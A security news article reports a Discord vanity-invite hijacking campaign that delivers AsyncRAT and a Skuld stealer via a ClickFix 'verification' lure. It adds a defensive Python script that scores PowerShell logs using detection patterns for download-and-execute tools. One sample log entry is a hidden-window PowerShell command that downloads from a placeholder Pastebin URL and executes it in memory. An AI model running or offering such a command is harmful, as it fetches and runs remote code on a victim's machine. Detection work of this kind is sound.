A new malicious campaign is abusing a loophole in Discord’s invitation system to distribute malware, including the AsyncRAT remote access trojan and a modified variant of the Skuld information stealer, according to cybersecurity researchers at Check Point.
The attackers hijacked expired or deleted vanity invite links on Discord, redirecting users from legitimate communities to malicious servers under their control.
Once inside the rogue server, users are prompted to complete a so-called ‘verification’ step. In reality, this is a phishing attempt using the ClickFix tactic. Victims are tricked into copying and running a malicious PowerShell command disguised as a verification process. The command initiates a stealthy infection chain, eventually delivering AsyncRAT and the Skuld Stealer.
AsyncRAT enables full remote control over an infected device and uses a technique called a ‘dead drop resolver’ to connect to its command-and-control (C2) server via Pastebin. Meanwhile, Golang-based Skuld harvests sensitive data from browsers, Discord, gaming platforms, and crypto wallets such as Exodus and Atomic. It even replaces legitimate app files with trojanized versions downloaded from GitHub using the wallet injection technique.
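The ClickFix step described above leaves a trace that defenders can look for: a PowerShell command, pasted by the victim, that hides its window, fetches a second stage from a paste or code-hosting site such as Pastebin or GitHub, and executes it in memory. The following Python script is an added example written for this article, not code from Check Point or from the campaign; it scores Windows PowerShell script-block log entries (Event ID 4104) against a set of heuristics. The rule patterns, weights, threshold, log line format and sample entries are all assumptions constructed for the example, not indicators published in the report.

```python
"""
Score PowerShell script-block log entries (Windows Event ID 4104) for the
traits of a ClickFix-style lure: a command that hides its window, pulls a
second stage from a paste/code-hosting site and runs it in memory.
"""
import re
from dataclasses import dataclass, field

# Heuristic patterns and weights are assumptions for this example, based on
# publicly documented ClickFix tradecraft, not indicators from the article.
RULES = {
    "hidden_window":      (2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    "encoded_command":    (2, re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    "remote_fetch":       (1, re.compile(r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|curl|wget)\b", re.I)),
    "in_memory_exec":     (2, re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
    "paste_or_code_host": (2, re.compile(r"\b(?:pastebin\.com|raw\.githubusercontent\.com|bitbucket\.org)\b", re.I)),
    "verification_lure":  (1, re.compile(r"\b(?:verif(?:y|ication)|captcha)\b", re.I)),
}
ALERT_THRESHOLD = 4  # assumed: several weak signals together raise an alert


@dataclass
class Finding:
    line_no: int
    score: int
    hits: list = field(default_factory=list)
    script: str = ""


def score_script_block(text: str) -> tuple[int, list[str]]:
    """Return (score, matched rule names) for one script-block text."""
    hits = [name for name, (_, rx) in RULES.items() if rx.search(text)]
    score = sum(RULES[name][0] for name in hits)
    return score, hits


def scan_log(lines) -> list[Finding]:
    """Extract ScriptBlockText from each 4104 line and return alerts."""
    findings = []
    for i, line in enumerate(lines, 1):
        if "EventID=4104" not in line or "ScriptBlockText=" not in line:
            continue
        script = line.split("ScriptBlockText=", 1)[1]
        score, hits = score_script_block(script)
        if score >= ALERT_THRESHOLD:
            findings.append(Finding(i, score, hits, script))
    return findings


# Constructed sample log lines (assumed key=value export format, not real telemetry).
SAMPLE_LOG = [
    r"2025-06-12T10:01:03Z host=WS-01 EventID=4104 ScriptBlockText=Get-ChildItem C:\Users\alice\Documents",
    r"2025-06-12T10:04:51Z host=WS-01 EventID=4104 ScriptBlockText=powershell -w hidden -c "
    r"\"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')\" # Discord verification",
    r"2025-06-12T10:09:17Z host=WS-02 EventID=4104 ScriptBlockText=Invoke-WebRequest https://www.example.com/update.zip -OutFile update.zip",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: score={f.score} hits={f.hits}")
        print(f"  {f.script}")
```

Only the second sample entry crosses the threshold: a plain directory listing scores zero, and a single download with no hidden window or in-memory execution scores too low to alert. Tuning the weights against a baseline of your own environment's script-block logs is the practical step that makes such a rule usable.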
The campaign’s infrastructure leverages trusted cloud services like GitHub, Pastebin, Bitbucket, and Discord itself, allowing it to evade traditional security detection.
Discord has since disabled the malicious bot, disrupting the attack chain. However, Check Point also discovered a parallel operation by the same threat actor involving a fake game hacking tool, downloaded over 350 times, that delivers the same loader.
Victims appear to be largely located in the US, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the UK.